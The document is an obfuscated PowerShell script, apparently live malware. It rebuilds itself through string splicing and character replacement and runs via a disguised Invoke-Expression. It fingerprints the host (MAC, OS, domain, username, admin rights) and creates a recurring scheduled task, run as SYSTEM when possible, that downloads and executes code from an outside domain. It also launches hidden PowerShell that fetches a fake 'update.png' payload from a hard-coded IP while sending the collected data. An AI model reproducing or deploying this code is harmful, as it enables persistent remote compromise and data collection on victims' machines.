(('[string]xwhmac = (getmac /FO CSV'+'eKASelect-Object -Skip 1 -first 1eKA ConvertFrom-Csv -Heade'+'r MACeKAselect-object -expand MAC)try{	xwhname = vPgGlobalMQcPSEXECvPg	xwhexeflag = xwhflase	New-Object System.Threading.Mutex (xwh'+'true,xwh'+'n'+'ame,[re'+
'f]xwhexeflag'+')}'+'catch{}xwhd'+'t = Get-Date -Format vPgyyMMddvPgxwhpath = 46Cxwhenv:tempMQcMQcccc.log46C[string'+']xwhflag = test-'+'path xwhpathxwhpermit =  ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRo
le([Security.Principal.WindowsBuiltInRole] 4'+'6CAdministrator46C)xwhkey = 46Cmac=46C+xwhmac+46C&av=46C+xwhav+46C&version=46C+(Get-WmiObject '+'-Class Win32_OperatingSystem).version+46C&bit=4'+'6C+(Get-WmiObject Win32'+'_OperatingSyst'+'em).OSArchit'+'ecture
 + 46C&flag2=46C + xwhflag + 46C&domain=46C + (Get-WmiObject win32_computersystem).Domain + 46C&user=46C + xwhenv:USERNAME + 46C&'+'PS=46C + xwhexeflagif(xwhflag -eq vPgFalsevPg){	New-Item xwhpath -type file	if(xw'+'hpermit){		try{		xwhText = 46CIEX (New-Obj
e'+'ct Net.WebClient).d'+'ownloadstring(vP'+'ghttp://cdn.'+'chatcdn'+'.ne'+'t/p?hig46C + xwhdt + 46CvPg)46C		xwhBytes = [System.Text.Encoding]::Unicode.GetBytes'+'(xwhText)	'+'	xwhbcode = [Convert]::ToBase64String(xwhByt'+'es)		xwhscexec = 46C/create /ru sys
tem /sc MINUTE /mo 45 /tn Winn'+'et /tr 46C + vPg46CvPg +'+' 46Cpowershell '+'-ep bypass -e xwhbcode46C + vPg46C /FvPg		Start-Process -FilePath schtasks.exe -Argume'+'ntList 46Cxwhscexec46C		}catch{}	}else{		try{		xwhText = 46CIEX (New-Object Net.WebClient).
downloadstring(vPghttp://cd'+'n.chatcdn.ne'+'t/p?low46C'+' + xwhdt + 46CvPg)46C		xwhBytes = [System.Text.Encoding]::Unicode.GetBytes(xwhText)		xwhbcode = ['+'Convert]::ToBas'+'e64String(xwhBytes)		xwhsc'+'exec = 46C/create /sc MINUTE /mo 45 /tn Winnet /tr 46
C + vPg46CvPg + 46Cpowershell -ep bypass -e xwhbcode46C + vPg'+'46C /FvPg		Start-Process -F'+'ilePath schta'+'sks.exe -ArgumentList 46Cxwhscexec46C		}catch{}	}	&'+'schtasks /run /tn 46CWinnet46C}else{}sleep ('+'get-random -inputob'+'ject (1..30))try{	xwhrun 
= Get-WmiObject Win32_Process eKA select'+' commandline eKA Select-String -Pattern 46Cupdate.png46C	if(xwhrun.length -eq 0){	xwhonps = 46C/c powershell -nop -w hidden -ep bypass -c 46C + vPg46CvPg + 46CIEX (New-Object Net.WebClient).download'+'string(vP'+'g4
6C + 46Chttp://188.166.162.201/update.png?v&46C + xwhkey + 46CvPg)46C + vPg46CvPg	Start-Process -FilePath cmd.exe -ArgumentList 46Cxwhonps46C	}else{}}catch{}'+'slee'+'p (get-random -inputobj'+'ect (1..20))kill xwhpid')  -rePLACe 'vPg',[Char]39-rePLACe  '46C'
,[Char]34 -cREpLACE([Char]101+[Char]75+[Char]65),[Char]124  -cREpLACE 'MQc',[Char]92 -rePLACe'xwh',[Char]36) | & ( $PsHOme[4]+$PShoMe[30]+'x')
